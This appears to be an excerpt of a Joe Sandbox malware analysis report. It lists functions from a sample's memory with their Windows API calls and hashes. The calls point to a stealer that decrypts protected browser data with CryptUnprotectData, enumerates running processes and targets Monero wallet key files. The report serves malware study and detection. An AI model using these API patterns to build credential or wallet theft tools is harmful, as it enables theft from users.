                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !Pws$%u]g$@h>$U=tn$]g{;
                  • API String ID: 0-1203533134
                  • Opcode ID: 248760e5c8c830d1c725f5091bd2d807eb68f80ee847c786af39a25df3752e3e
                  • Instruction ID: 743a2196d54ffc96df0470579b25d281442a76e9674eb41131016786deaa7bb4
                  • Opcode Fuzzy Hash: 248760e5c8c830d1c725f5091bd2d807eb68f80ee847c786af39a25df3752e3e
                  • Instruction Fuzzy Hash: 66B22AF3A082109FE704AE2DEC9577ABBE9EF94320F16463DEAC4D3744E63558018697
                  Function 0087C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0087C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0087C87C
                  • lstrcat.KERNEL32(?,00890B46), ref: 0087C943
                  • lstrcat.KERNEL32(?,00890B47), ref: 0087C957
                  • lstrcat.KERNEL32(?,00890B4E), ref: 0087C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: c672a84a085b764e728c68d5b00a1189c8c3ce4926da6b93c82500494c9e887f
                  • Instruction ID: e9a3dc5276ac41e117a6f94c8d188e4608e2ad3ffacc572e0a6194e7a71b4830
                  • Opcode Fuzzy Hash: c672a84a085b764e728c68d5b00a1189c8c3ce4926da6b93c82500494c9e887f
                  • Instruction Fuzzy Hash: A64162B590420ADFCB10DF90DC89BEEB7B8FB48304F1042A8E609A7281D7749A85CF91
                  Function 00877240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0087724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00877254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00877281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008772A4
                  • LocalFree.KERNEL32(?), ref: 008772AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 27d9a0916f188c52c4665e469c17b736cd1533fb2d0ee6bf886a183a4b482c7c
                  • Instruction ID: ea8cdaa0882b2d8d88eba856bd1a91e100e3a16bae5a14ca0ffdcdfdfd51c272
                  • Opcode Fuzzy Hash: 27d9a0916f188c52c4665e469c17b736cd1533fb2d0ee6bf886a183a4b482c7c
                  • Instruction Fuzzy Hash: 9B010075A40208BBEB10DFD4CD45F9D7778FB44704F108154FB09EB2D1D670AA018B65
                  Function 00889600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0088961E
                  • Process32First.KERNEL32(00890ACA,00000128), ref: 00889632
                  • Process32Next.KERNEL32(00890ACA,00000128), ref: 00889647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0088965C
                  • CloseHandle.KERNEL32(00890ACA), ref: 0088967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 31d72e30bfdda2132cffdc9a57837558e05a47a886c54a16239047f64df64a1b
                  • Instruction ID: 378de6bf548da0443cfd543698965280a8dde59899a7a4976047fbed57963faf
                  • Opcode Fuzzy Hash: 31d72e30bfdda2132cffdc9a57837558e05a47a886c54a16239047f64df64a1b
                  • Instruction Fuzzy Hash: 250100B5A00208ABCB14DFE5DD54BEDB7F8FB58300F144288E545D6250EB349B41DF51
                  Function 00888680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008905B7), ref: 008886CA
                  • Process32First.KERNEL32(?,00000128), ref: 008886DE
                  • Process32Next.KERNEL32(?,00000128), ref: 008886F3
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • CloseHandle.KERNEL32(?), ref: 00888761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: dd1bf4381759569cd2bbc6eb5fde37b40ad0f24846ecf3863c2a695251847137
                  • Instruction ID: 48ff574ce7b5f63faaa4a7291140aee1dcec14e6f4c5f7d4b2dbf97d710282af
                  • Opcode Fuzzy Hash: dd1bf4381759569cd2bbc6eb5fde37b40ad0f24846ecf3863c2a695251847137
                  • Instruction Fuzzy Hash: 71314A71901218ABDB28FB94CC45FEEB778FB45700F5041AAE50AE21A0DF346A45CFA2
                  Function 00888EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00875184,40000001,00000000,00000000,?,00875184), ref: 00888EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 72f1c4946dc2d3613d1256815db4cd18764bc7e900ae96c99e0a3f319583985a
                  • Instruction ID: 578ff9629cc891f4eeeb3711f1782df99245b9b3f55d1b7533b64ba0b355790f
                  • Opcode Fuzzy Hash: 72f1c4946dc2d3613d1256815db4cd18764bc7e900ae96c99e0a3f319583985a
                  • Instruction Fuzzy Hash: BF110670200208EFDB00DFA4E884FAA37A9FF89304F509548FA19CB251DB35EC41DB60
                  Function 00879AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00874EEE,00000000,?), ref: 00879B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879B2A
                  • LocalFree.KERNEL32(?,?,?,?,00874EEE,00000000,?), ref: 00879B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 79eb159e9de22e63dd5e60b3bdad102758f4ee4c3dbcf1ca11903e27c66293b1
                  • Instruction ID: fd77e73d4d66e83ffb90ff5679e0be107385eee836d27ac33e6157867e3fb24f
                  • Opcode Fuzzy Hash: 79eb159e9de22e63dd5e60b3bdad102758f4ee4c3dbcf1ca11903e27c66293b1
                  • Instruction Fuzzy Hash: 4011A4B4240308AFEB10CFA4DC95FAA77B5FB89710F208158F9199B3A4C775A901CB50
                  Function 00887980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00890E00,00000000,?), ref: 008879B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 008879B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00890E00,00000000,?), ref: 008879C4
                  • wsprintfA.USER32 ref: 008879F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 6ad3baab7c03d21ae0c02c9f0ce2a41b6e440a6ba9e537ac97c742b6ae524320
                  • Instruction ID: a279785f1b90d3397fed5ac8745c04edb6b94ffef3824fd92f11f218a650d4de
                  • Opcode Fuzzy Hash: 6ad3baab7c03d21ae0c02c9f0ce2a41b6e440a6ba9e537ac97c742b6ae524320
                  • Instruction Fuzzy Hash: 321127B2904118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AF605A2290E2395941CBB1
                  Function 00887A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015DD830,00000000,?,00890E10,00000000,?,00000000,00000000), ref: 00887A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00887A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015DD830,00000000,?,00890E10,00000000,?,00000000,00000000,?), ref: 00887A7D
                  • wsprintfA.USER32 ref: 00887AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: e9e115e9420e09a5617cee7e3269ef006c311fa0590f6e57aece1a85cce7a458
                  • Instruction ID: 2eb7b458f78956bb5c0fa4bd42424f284eb6e7cb7f6afd8a000a7b2aedb0f2fc
                  • Opcode Fuzzy Hash: e9e115e9420e09a5617cee7e3269ef006c311fa0590f6e57aece1a85cce7a458
                  • Instruction Fuzzy Hash: 91117CB1945228EBEB20DB94DC49FA9B7B8FB04721F10439AE91A932D0D7745A40CF91
                  Function 00C34E9B Relevance: 5.3, Strings: 3, Instructions: 1556COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !w:$^o{^$ny
                  • API String ID: 0-3038142128
                  • Opcode ID: cd462f84c23f40d1000322aec937154ce4cd265ab4711a9794f16fae1c977833
                  • Instruction ID: b8421a359449f2f6bea1a26c05467d483fc8c31630dbc06282a3e42981f3ecec
                  • Opcode Fuzzy Hash: cd462f84c23f40d1000322aec937154ce4cd265ab4711a9794f16fae1c977833
                  • Instruction Fuzzy Hash: DDA227F390C2009FE7046E2DEC8567ABBE9EB94320F1A493DEAC5C7744EA3558058797
                  Function 00C3BD76 Relevance: 5.1, Strings: 3, Instructions: 1352COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: T,;$|+[[$8w
                  • API String ID: 0-572241805
                  • Opcode ID: fe06adc2684fa7659c24aa105e2aec81f51e21fb298151dcf51d27632e95d455
                  • Instruction ID: 15b1ae25165e358f8d1d60bbb02d530b767368373e0d4f0c97dc95ac361a3a76
                  • Opcode Fuzzy Hash: fe06adc2684fa7659c24aa105e2aec81f51e21fb298151dcf51d27632e95d455
                  • Instruction Fuzzy Hash: F3920BF36086009FE304AE2DED8566AFBEAEFD4720F1A853DE6C4C7744E63558058792
                  Function 00883720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(0088E118,00000000,00000001,0088E108,00000000), ref: 00883758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008837B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
